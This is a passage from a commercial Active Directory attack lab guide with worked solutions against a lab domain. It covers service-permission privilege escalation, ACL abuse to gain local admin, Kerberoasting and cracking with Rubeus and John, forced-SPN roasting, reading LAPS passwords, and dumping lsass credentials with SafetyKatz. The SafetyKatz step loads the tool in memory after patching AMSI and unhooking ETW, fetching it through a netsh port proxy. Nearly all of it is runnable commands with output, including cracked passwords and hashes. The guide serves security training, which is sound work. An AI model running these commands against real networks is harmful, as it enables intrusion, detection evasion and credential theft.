DC.US.TECHCORP.LOCAL/DC=techcorp,DC=local
VERBOSE: [Get-DomainUser] filter string:
(&(samAccountType=805306368)(|(samAccountName=krbtgt)))

SourceName : us.techcorp.local
TargetName : eu.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FILTER_SIDS
TrustDirection : Bidirectional
WhenCreated : 7/13/2019 11:17:35 AM
WhenChanged : 1/7/2021 11:38:29 AM

Note that we have a bi-directional trust with eu.local. In a bi-directional trust or incoming one-way trust
from eu.local to us.techcorp.local, we can extract information from the eu.local forest. Let's go for the
last task and enumerate trusts for eu.local forest using the Active Directory module:

PS C:\AD\Tools> Get-ADTrust -Filter * -Server eu.local

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=us.techcorp.local,CN=System,DC=eu,DC=local
ForestTransitive : False
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : us.techcorp.local
ObjectClass : trustedDomain
ObjectGUID : 2d5aff75-d002-4b92-ab1a-8313f9a6205f
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : True
Source : DC=eu,DC=local
Target : us.techcorp.local
TGTDelegation : False
TrustAttributes : 4
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 22

UsesAESKeys : False
UsesRC4Encryption : False

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=euvendor.local,CN=System,DC=eu,DC=local
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : euvendor.local
ObjectClass : trustedDomain
ObjectGUID : 7f2eb7ca-70bc-4f72-92a7-c04aaaf296c4
SelectiveAuthentication : False
SIDFilteringForestAware : True
SIDFilteringQuarantined : False
Source : DC=eu,DC=local
Target : euvendor.local
TGTDelegation : False
TrustAttributes : 72
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

Using PowerView:

PS C:\AD\Tools> Get-ForestTrust -Forest eu.local

TopLevelNames : {euvendor.local}
ExcludedTopLevelNames : {}
TrustedDomainInformation : {euvendor.local}
SourceName : eu.local
TargetName : euvendor.local
TrustType : Forest
TrustDirection : Bidirectional

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 23

Hands-On 5:
Task
• Exploit a service on studentx and elevate privileges to local administrator.
• Identify a machine in the domain where studentuserx has local administrative access due to
group membership.

Solution
We can use any tool from PowerUp, beRoot, Invoke-Privesc or Accesschk from the SysInternals suite to
look for service related issues.

PowerUp
Let's use PowerUp from InvisiShell. Remember to run it from a new process and do not use the same
one where PowerView is loaded:

C:\Users\studentuserx>cd C:\AD\Tools\

C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

C:\AD\Tools>set COR_ENABLE_PROFILING=1

C:\AD\Tools>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-

b283c03916db}" /f
The operation completed successfully.

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-

b283c03916db}\InprocServer32" /f
The operation completed successfully.

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-

b283c03916db}\InprocServer32" /ve /t REG_SZ /d
"C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.

C:\AD\Tools>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\AD\Tools> . C:\AD\Tools\PowerUp.ps1
PS C:\AD\Tools> Invoke-AllChecks
[*] Running Invoke-AllChecks
[snip]
[*] Checking service permissions...
ServiceName : ALG
Path : C:\Windows\System32\alg.exe
StartName : LocalSystem

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 24

AbuseFunction : Invoke-ServiceAbuse -Name 'ALG'
CanRestart : True
[snip]

Let’s use the abuse function for the service permission issue and add our current domain user to the local
Administrators group.

PS C:\AD\Tools> Invoke-ServiceAbuse -Name ALG -UserName us\studentuserx -

Verbose
VERBOSE: Service 'ALG' original path: 'C:\Windows\System32\alg.exe'
VERBOSE: Service 'ALG' original state: 'Running'
VERBOSE: Executing command 'net localgroup Administrators us\studentuserx
/add'
VERBOSE: binPath for ALG successfully set to 'net localgroup Administrators
us\studentuserx /add'
VERBOSE: Restoring original path to service 'ALG'
VERBOSE: binPath for ALG successfully set to 'C:\Windows\System32\alg.exe'
VERBOSE: Restarting 'ALG'

ServiceAbused Command
------------- -------
ALG net localgroup Administrators us\studentuserx /add

We can see that the us\studentuserx is a local administrator now. Just logoff and logon again and we have
local administrator privileges!

AccessChk
The same attack can be executed with accessch64.exe from Sysinternals:

PS C:\AD\Tools\AccessChk> .\accesschk64.exe -uwcqv 'studentuserx' *

Accesschk v6.12 - Reports effective permissions for securable objects

RW ALG
SERVICE_ALL_ACCESS

We can see that the studentuserx has Full Permissions on ALG service. Let's abuse the permissions
manually:

sc.exe config ALG binPath= "net localgroup administrators us\studentuserx

/add"
sc.exe stop ALG
sc.exe start ALG
sc.exe config ALG binPath= "C:\WINDOWS\System32\alg.exe"
sc.exe stop ALG
sc.exe start ALG

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 25

Now, we need to identify a machine in the domain where studentuserx has local administrative access.
Usually hunting for local administrator privileges is the way to go. Using PowerView:

PS C:\AD\Tools> Find-LocalAdminAccess -Verbose

VERBOSE: [Find-LocalAdminAccess] Querying computers in the domain
VERBOSE: [Get-DomainSearcher] search base: LDAP://US-
DC.US.TECHCORP.LOCAL/DC=US,DC=TECHCORP,DC=LOCAL
VERBOSE: [Get-DomainComputer] Get-DomainComputer filter string:
(&(samAccountType=805306369))
VERBOSE: [Find-LocalAdminAccess] TargetComputers length: 22
VERBOSE: [Find-LocalAdminAccess] Using threading with threads: 20
VERBOSE: [New-ThreadedFunction] Total number of hosts: 22
VERBOSE: [New-ThreadedFunction] Total number of threads/partitions: 20
VERBOSE: [New-ThreadedFunction] Threads executing
[snip]

We got no output. Similar results for Find-WMILocalAdminAccess.ps1 and Find-

PSRemotingLocalAdminAccess.ps1.

Let's enumerate group memberships for studentuserx. The ActiveDirectory module command Get-
ADPrinicpalGroupMemebsrhip does not provide ability to recursively look for group membership.
Therefore, we can use the following simple PowerShell code from InvisiShell. Note that the code uses the
ActiveDirectory module so that should be imported first:

function Get-ADPrincipalGroupMembershipRecursive ($SamAccountName)

{
$groups = @(Get-ADPrincipalGroupMembership -Identity $SamAccountName |
select -ExpandProperty distinguishedname)
$groups
if ($groups.count -gt 0)
{
foreach ($group in $groups)
{
Get-ADPrincipalGroupMembershipRecursive $group
}
}
}

Get-ADPrincipalGroupMembershipRecursive 'studentuserx'

CN=Domain Users,CN=Users,DC=us,DC=techcorp,DC=local
CN=StudentUsers,CN=Users,DC=us,DC=techcorp,DC=local
CN=Users,CN=Builtin,DC=us,DC=techcorp,DC=local
CN=MaintenanceUsers,CN=Users,DC=us,DC=techcorp,DC=local
CN=Managers,CN=Users,DC=us,DC=techcorp,DC=local

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 26

Let's check if any of the above groups has interesting ACL entries. After trying for multiple groups, we will
find out that us\managers group does have some interesting permissions. Using PowerView from
InvisiShell:

PS C:\AD\Tools> Find-InterestingDomainAcl -ResolveGUIDs |

?{$_.IdentityReferenceName -match 'managers'}
[snip]

ObjectDN : CN=MachineAdmins,OU=Mgmt,DC=us,DC=techcorp,DC=local
ObjectSID : S-1-5-21-210670787-2521448726-163245708-1118
IdentitySID : S-1-5-21-210670787-2521448726-163245708-1117
ActiveDirectoryRights : GenericAll
InheritanceType : All
ObjectType : 00000000-0000-0000-0000-000000000000
InheritedObjectType : bf967a9c-0de6-11d0-a285-00aa003049e2
ObjectFlags : InheritedObjectAceTypePresent
AccessControlType : Allow
IdentityReferencename : US\managers
IsInherited : True
InheritanceFlags : ContainerInherit
PropagationFlags : None

We can check the ACEs quickly using Get-DomainsObjectACL from PowerView:

PS C:\AD\Tools> Get-DomainObjectAcl -Identity machineadmins -ResolveGUIDs |

ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-
SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match 'managers'}

ObjectDN : CN=MachineAdmins,OU=Mgmt,DC=us,DC=techcorp,DC=local
ObjectSID : S-1-5-21-210670787-2521448726-163245708-1118
ActiveDirectoryRights : ReadProperty, WriteProperty
IdentityName : US\managers
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
ObjectAceType : bf9679c0-0de6-11d0-a285-00aa003049e2
InheritedObjectAceType : bf967a9c-0de6-11d0-a285-00aa003049e2
BinaryLength : 72
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 48
SecurityIdentifier : S-1-5-21-210670787-2521448726-163245708-1117
AceType : AccessAllowedObject
AceFlags : ContainerInherit, Inherited
IsInherited : True
InheritanceFlags : ContainerInherit
PropagationFlags : None
AuditFlags : None
[snip]

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 27

So, studentuserx through group membership of Managers group has GenericAll rights on machineadmins
group. Recall from previous hands-on that machineadmins has membership of a local group in the Mgmt
OU.

Also, if we have a look at the machineadmins group, its description explains a lot. Using ActiveDirectory
module:

PS C:\AD\Tools> Get-ADGroup -Identity machineadmins -Properties Description

Description : Group to manage machines of the Mgmt OU

DistinguishedName : CN=MachineAdmins,OU=Mgmt,DC=us,DC=techcorp,DC=local
GroupCategory : Security
GroupScope : Global
Name : MachineAdmins
ObjectClass : group
ObjectGUID : a02c806e-f233-4c39-a0cc-adf37628365a
SamAccountName : machineadmins
SID : S-1-5-21-210670787-2521448726-163245708-1118

Let's add studentuserx to machineadmins group as we have GenericAll permissions on the group. Using
AD module:

PS C:\AD\Tools> Add-ADGroupMember -Identity MachineAdmins -Members studentuserx

-Verbose
VERBOSE: Performing the operation "Set" on target
"CN=MachineAdmins,OU=Mgmt,DC=us,DC=techcorp,DC=local".

Now, check if we have administrative access to the us-mgmt machine in the Mgmt OU it is the only
machine in that OU). Note that we need to clear our existing TGT so that the new group membership is
assigned in the new TGT. So, a logoff and logon may be required.
We can use winrs for accessing us-mgmt:

PC:\Users\studentuserx>winrs -r:us-mgmt cmd

Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\studentuserx>whoami
us\studentuserx

We can also try with PowerShell Remoting. Note that it will have verbose logging on the remote machine:

PS C:\Users\studentuserx> $usmgmt = New-PSSession us-mgmt

PS C:\Users\studentuserx> Enter-PSSession $usmgmt
[us-mgmt]: PS C:\Users\TEMP\Documents> hostname
US-Mgmt

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 28

[us-mgmt]: PS C:\Users\TEMP\Documents> whoami
us\studentuserx
[us-mgmt]: PS C:\Users\TEMP\Documents>

BloodHound
Using BloodHound, you can search for studentuserx node and check out the 'Group Delegated Object
Control' under Outbound Object Control

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 29

Hands-On 6:
Task
• Using the Kerberoast attack, get the clear-text password for an account in us.techcorp.local
domain.

Solution
We first need to find out services running with user accounts as the services running with machine
accounts have difficult passwords. We can use PowerView’s (Get-DomainUser –SPN) or ActiveDirectory
module for discovering such services. Using ActiveDirectory module:

PS C:\AD\Tools> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -

Properties ServicePrincipalName

DistinguishedName : CN=krbtgt,CN=Users,DC=us,DC=techcorp,DC=local
Enabled : False
GivenName :
Name : krbtgt
ObjectClass : user
ObjectGUID : 6dce7bd9-287f-4ab3-b5ba-0bb1e8aab391
SamAccountName : krbtgt
ServicePrincipalName : {kadmin/changepw}
SID : S-1-5-21-210670787-2521448726-163245708-502
Surname :
UserPrincipalName :

DistinguishedName : CN=serviceaccount,CN=Users,DC=us,DC=techcorp,DC=local
Enabled : True
GivenName : service
Name : serviceaccount
ObjectClass : user
ObjectGUID : 8a97f972-51b1-4647-8b73-628f5da8ca01
SamAccountName : serviceaccount
ServicePrincipalName : {USSvc/serviceaccount}
SID : S-1-5-21-210670787-2521448726-163245708-1144
Surname : account
UserPrincipalName : serviceaccount
[snip]

Please note that it is not necessary to have an actual service using 'serviceaccount'. For the DC, an
account with SPN set is a service account.

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 30

Rubeus and John the Ripper
We can use Rubeus to get hashes for the serviceaccount. Note that we are using the /rc4opsec option
that gets hashes only for the accounts that support RC4. This means that if ' This account supports
Kerberos AES 128/256 bit encryption' is set for a service account, the below command will not request
its hashes.

C:\AD\Tools>C:\AD\Tools\Rubeus.exe kerberoast /user:serviceaccount /simple

/rc4opsec /outfile:C:\AD\Tools\hashes.txt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user

[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will
be requested for everything else
[*] Target User : serviceaccount
[+] Ticket successfully imported!
[*] Searching path 'LDAP://US.TECHCORP.LOCAL/DC=US,DC=TECHCORP,DC=LOCAL' for
Kerberoastable users
[*] Searching for accounts that only support RC4_HMAC, no AES

[*] Total kerberoastable users : 1

[*] Hash written to C:\AD\Tools\hashes.txt

[*] Roasted hashes written to : C:\AD\Tools\hashes.txt

We can now use John the Ripper to brute-force the hashes.

C:\AD\Tools> C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --
wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password123 (?)
1g 0:00:00:00 DONE (2021-01-10 02:12) 76.92g/s 59076p/s 59076c/s 59076C/s
password..9999
Use the "--show" option to display all of the cracked passwords reliably
Session completed

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 31

KerberosRequestorSecurityToken.NET class from PowerShell, Mimikatz and tgsrepcrack.py
We can also use the KerberosRequestorSecurityToken .NET class from PowerShell to request a ticket.
Now, let’s request a ticket for the serviceaccount user:

PS C:\AD\Tools> Add-Type -AssemblyName System.IdentityModel

PS C:\AD\Tools> New-Object
System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList
"USSvc/serviceaccount"

Id : uuid-205a6721-7110-4433-8a47-6687a2ba2f31-1
SecurityKeys :
{System.IdentityModel.Tokens.InMemorySymmetricSecurityKey}
ValidFrom : 1/10/2021 1:04:23 PM
ValidTo : 1/10/2021 7:45:57 PM
ServicePrincipalName : USSvc/serviceaccount
SecurityKey :
System.IdentityModel.Tokens.InMemorySymmetricSecurityKey

Let's check if we got the ticket:

PS C:\AD\Tools> klist

#2> Client: studentuserx @ US.TECHCORP.LOCAL

Server: USSvc/serviceaccount @ US.TECHCORP.LOCAL
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x60210000 -> forwardable forwarded pre_authent
name_canonicalize
Start Time: 1/10/2021 5:04:23 (local)
End Time: 1/10/2021 11:45:57 (local)
Renew Time: 0
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called: US-DC.us.techcorp.local
[snip]

Now, let’s dump the tickets on disk:

PS C:\AD\Tools> . C:\AD\Tools\Invoke-Mimi.ps1
PS C:\AD\Tools> Invoke-Mimi -Command '"kerberos::list /export"'

.#####. mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::list /export

[snip]

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 32

[00000002] - 0x00000017 - rc4_hmac_nt
Start/End/MaxRenew: 1/10/2021 5:04:23 AM ; 1/10/2021 11:45:57 AM ;
Server Name : USSvc/serviceaccount @ US.TECHCORP.LOCAL
Client Name : studentuserx @ US.TECHCORP.LOCAL
Flags 60210000 : name_canonicalize ; pre_authent ; forwarded ;
forwardable ;
* Saved to file : 2-60210000-studentuserx@USSvc~serviceaccount-
US.TECHCORP.LOCAL.kirbi
[snip]

Let's brute-force the ticket now:

PS C:\AD\Tools> Copy-Item C:\AD\Tools\2-60210000-

studentuserx@USSvc~serviceaccount-US.TECHCORP.LOCAL.kirbi
C:\AD\Tools\kerberoast\
PS C:\AD\Tools> cd C:\AD\Tools\kerberoast\
PS C:\AD\Tools\kerberoast> python.exe .\tgsrepcrack.py .\10k-worst-pass.txt
.\2-60210000-studentuserx@USSvc~serviceaccount-US.TECHCORP.LOCAL.kirbi
found password for ticket 0: Password123 File: .\2-60210000-
studentuserx@USSvc~serviceaccount-US.TECHCORP.LOCAL.kirbi
All tickets cracked!

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 33

Hands-On 7:
Task
• Determine if studentuserx has permissions to set UserAccountControl flags for any user.
• If yes, force set a SPN on the user and obtain a TGS for the user.

Solution
Let’s check if studentuserx has permissions to set User Account Control settings for any user. Recall from
a previous hands-on that we also scan ACLs if any group of which studentuserx is a member has
interesting permissions. Run the below PowerView command from InvisiShell:

PS C:\AD\Tools> Find-InterestingDomainAcl -ResolveGUIDs |

?{$_.IdentityReferenceName -match "StudentUsers"}

ObjectDN :
CN=Support23User,CN=Users,DC=us,DC=techcorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-210670787-2521448726-163245708-1116
IdentityReferenceName : studentusers
IdentityReferenceDomain : us.techcorp.local
IdentityReferenceDN : CN=StudentUsers,CN=Users,DC=us,DC=techcorp,DC=local
IdentityReferenceClass : group

ObjectDN :
CN=Support24User,CN=Users,DC=us,DC=techcorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-210670787-2521448726-163245708-1116
IdentityReferenceName : studentusers
IdentityReferenceDomain : us.techcorp.local
IdentityReferenceDN : CN=StudentUsers,CN=Users,DC=us,DC=techcorp,DC=local
IdentityReferenceClass : group
[snip]

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 34

Let’s check if supportXuser already has a SPN. We can do it with PowerView or ActiveDirectory module.
Use the below command from the Active Directory module:

PS C:\AD\Tools> Get-ADUser -Identity supportXuser -Properties

ServicePrincipalName | select ServicePrincipalName

ServicePrincipalName
--------------------
{}

Since studentuserX has GenericAll rights on the supportXuser, let’s force set a SPN on it. Using
ActiveDirectory module:

PS C:\AD\Tools> Set-ADUser -Identity supportXuser -ServicePrincipalNames

@{Add='us/myspnX'} -Verbose
VERBOSE: Performing the operation "Set" on target
"CN=SupportXUser,CN=Users,DC=us,DC=techcorp,DC=local".

Using PowerView:

PS C:\AD\Tools> Set-DomainObject -Identity supportXuser -Set

@{serviceprincipalname='us/myspnX'} -Verbose
[snip]

Now, once again check the SPN for supportXuser:

PS C:\AD\Tools> Get-ADUser -Identity supportXuser -Properties

ServicePrincipalName | select ServicePrincipalName

ServicePrincipalName
--------------------
us/myspnX

Now, we can Kerberoast the SPN:

C:\AD\Tools>C:\AD\Tools\Rubeus.exe kerberoast /user:supportXuser /simple

/rc4opsec /outfile:C:\AD\Tools\targetedhashes.txt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 35

v1.6.1

[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user

[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will
be requested for everything else
[*] Target User : supportXuser
[+] Ticket successfully imported!
[*] Searching path 'LDAP://US.TECHCORP.LOCAL/DC=US,DC=TECHCORP,DC=LOCAL' for
Kerberoastable users
[*] Searching for accounts that only support RC4_HMAC, no AES

[*] Total kerberoastable users : 1

[*] Hash written to C:\AD\Tools\targetedhashes.txt

[*] Roasted hashes written to : C:\AD\Tools\targetedhashes.txt

Let's brute-force the ticket now:

C:\AD\Tools>C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --
wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt
C:\AD\Tools\targetedhashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Desk@123 (?)
1g 0:00:00:00 DONE (2021-01-10 05:27) 66.66g/s 51200p/s 51200c/s 51200C/s
password..9999
Use the "--show" option to display all of the cracked passwords reliably
Session completed

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 36

Hands-On 8:
Task
• Identify OUs where LAPS is in use and user(s) who have permission to read passwords.
• Abuse the permissions to get the clear text password(s).

Solution
First, we need to find the OUs where LAPS is in use. We can enumerate this using the ActiveDirectory
module and LAPS module. Let's use Get-LAPSPermissions.ps1 PowerShell script for that. Remember that
we continue to use InvisiShell to run PowerShell tools:

PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-

master\Microsoft.ActiveDirectory.Management.dll
PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-
master\ActiveDirectory\ActiveDirectory.psd1
PS C:\AD\Tools> Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1 -Verbose
VERBOSE: Loading module from path 'C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1'.
VERBOSE: Importing cmdlet 'Find-AdmPwdExtendedRights'.
VERBOSE: Importing cmdlet 'Get-AdmPwdPassword'.
VERBOSE: Importing cmdlet 'Reset-AdmPwdPassword'.
VERBOSE: Importing cmdlet 'Set-AdmPwdAuditing'.
VERBOSE: Importing cmdlet 'Set-AdmPwdComputerSelfPermission'.
VERBOSE: Importing cmdlet 'Set-AdmPwdReadPasswordPermission'.
VERBOSE: Importing cmdlet 'Set-AdmPwdResetPasswordPermission'.
VERBOSE: Importing cmdlet 'Update-AdmPwdADSchema'.

PS C:\AD\Tools> C:\AD\Tools\Get-LapsPermissions.ps1

Read Rights

organizationalUnit IdentityReference
------------------ -----------------
OU=MailMgmt,DC=us,DC=techcorp,DC=local US\studentusers

Write Rights

OU=MailMgmt,DC=us,DC=techcorp,DC=local NT AUTHORITY\SELF

We also use PowerView for this enumeration:

PS C:\AD\Tools> Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-
Object {($_.ObjectAceType -like 'ms-Mcs-AdmPwd') -and
($_.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object {$_ | Add-
Member NoteProperty 'IdentityName' $(Convert-SidToName
$_.SecurityIdentifier);$_}

AceQualifier : AccessAllowed

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 37

ObjectDN : OU=MailMgmt,DC=us,DC=techcorp,DC=local
ActiveDirectoryRights : ReadProperty, ExtendedRight
ObjectAceType : ms-Mcs-AdmPwd
ObjectSID :
InheritanceFlags : ContainerInherit
BinaryLength : 72
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-21-210670787-2521448726-163245708-1116
AccessMask : 272
AuditFlags : None
IsInherited : False
AceFlags : ContainerInherit, InheritOnly
InheritedObjectAceType : Computer
OpaqueLength : 0
IdentityName : US\studentusers

So, the studentusers group can read password for LAPS managed Administrator on the us-mgmt
machine. Let's try it using the Active Directory module, LAPS module and PowerView. Note that the
password could be different for your lab:

Using ActiveDirectory module:

PS C:\AD\Tools> Get-ADComputer -Identity us-mailmgmt -Properties ms-mcs-

admpwd | select -ExpandProperty ms-mcs-admpwd
t7HoBF+m]ctv.]

Using LAPS module:

PS C:\AD\Tools> Get-AdmPwdPassword -ComputerName us-mailmgmt

ComputerName DistinguishedName Password
ExpirationTimestamp
------------ ----------------- --------
-------------------
US-MAILMGMT CN=US-MAILMGMT,OU=MailMgmt,DC=us,DC=techco...
t7HoBF+m]ctv.] 2/6/2021 10:47:23 PM

Using PowerView:

PS C:\AD\Tools> Get-DomainObject -Identity us-mailmgmt | select -

ExpandProperty ms-mcs-admpwd

t7HoBF+m]ctv.]

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 38

Let's try to access the mail-mgmt machine with this password by using winrs. Success means
administrative access:

C:\AD\Tools>winrs -r:us-mailmgmt -u:.\administrator -p:t7HoBF+m]ctv.] cmd

C:\Users\Administrator>hostname
hostname
US-MailMgmt

C:\Users\Administrator>whoami
whoami
us-mailmgmt\administrator

We can also use a PSRemoting session:

PS C:\AD\Tools> $passwd = ConvertTo-SecureString 't7HoBF+m]ctv.]' -

AsPlainText -Force
PS C:\AD\Tools> $creds = New-Object System.Management.Automation.PSCredential
("us-mailmgmt\administrator", $passwd)
PS C:\AD\Tools> $mailmgmt = New-PSSession -ComputerName us-mailmgmt -
Credential $creds
PS C:\AD\Tools> $mailmgmt

Id Name ComputerName ComputerType State

ConfigurationName Availability
-- ---- ------------ ------------ ----- -----------
------ ------------
1 WinRM1 us-mailmgmt RemoteMachine Opened
Microsoft.PowerShell Available

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 39

Hands-On 9:
Task
• Use Invoke-Mimi to extract credentials of interactive logon sessions and service accounts from
us-mailmgmt.

Solution
We can use either winrs and open-source binaries or PowerShell Remoting and Invoke-Mimi.ps1. Let us
try them one by one.

winrs and open-source binaries

Use the credentials for administrator from the previous hands-on to access us-mailmgmt. Remember that
the password could be different for your lab instance:

C:\AD\Tools>net use x: \\us-mailmgmt\C$\Users\Public /user:us-

mailmgmt\Administrator t7HoBF+m]ctv.]
The command completed successfully.
C:\AD\Tools>echo F | xcopy C:\AD\Tools\Loader.exe x:\Loader.exe
Does X:\Loader.exe specify a file name
or directory name on the target
(F = file, D = directory)? F
C:\AD\Tools\Loader.exe
1 File(s) copied
C:\AD\Tools>net use x: /d
x: was deleted successfully.

Next, we can download and run SafetyKatz in memory using Loader. To bypass behaviour detection of
SafetyKatz we need to perform an additional step. We need to forward traffic from local (target) machine
to the student machine. This way, the download always happens from 127.0.0.1

Run the following commands to connect to us-mailmgmt using winrs and forward the traffic. Remember
to modify the IP address in connectaddress in the netsh command to your student VM:

C:\AD\Tools>winrs -r:us-mailmgmt -u:.\administrator -p:t7HoBF+m]ctv.] cmd

Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\Administrator>netsh interface portproxy add v4tov4 listenport=8080
listenaddress=0.0.0.0 connectport=80 connectaddress=192.168.100.X

Now, we will use the Loader.exe to run SafetyKatz.exe from memory to extract credentials from the lsass
process. Remember to host SafetyKatz.exe on a local web server on your Student VM.

C:\Users\Administrator>C:\Users\Public\Loader.exe -path
http://127.0.0.1:8080/SafetyKatz.exe
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe
[!] ~Flangvik , ~Arno0x #NetLoader
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 40

[+] URL/PATH : http://127.0.0.1:8080/SafetyKatz.exe
[+] Arguments :

[*] Dumping lsass (708) to C:\Windows\Temp\test.txt

[+] Dump successful!

[*] Executing loaded Mimikatz PE

.#####. mimikatz 2.2.0 (x64) #19041 Dec 18 2020 22:37:12

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -path
ERROR mimikatz_doLocal ; "-path" command of "standard" module not found !
[snip]

In the Mimikatz prompt that opens up we can use the following command:

mimikatz # sekurlsa::keys

[snip]

Authentication Id : 0 ; 44772476 (00000000:02ab2c7c)

Session : Service from 0
User Name : provisioningsvc
Domain : US
Logon Server : US-DC
Logon Time : 11/5/2021 4:52:05 AM
SID : S-1-5-21-210670787-2521448726-163245708-8602

*
Username : provisioningsvc
*
Domain : US.TECHCORP.LOCAL
*
Password : (null)
*
Key List :
aes256_hmac
a573a68973bfe9cbfb8037347397d6ad1aae87673c4f5b4979b57c0b745aee2a
rc4_hmac_nt 44dea6608c25a85d578d0c2b6f8355c4
rc4_hmac_old 44dea6608c25a85d578d0c2b6f8355c4
rc4_md4 44dea6608c25a85d578d0c2b6f8355c4
[snip]

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 41

Alternatively, we could also use bitsadmin, a Microsoft signed binary to download NetLoader on us-
mailmgmt. Remember to host Loader.exe on a local web server on your student VM.

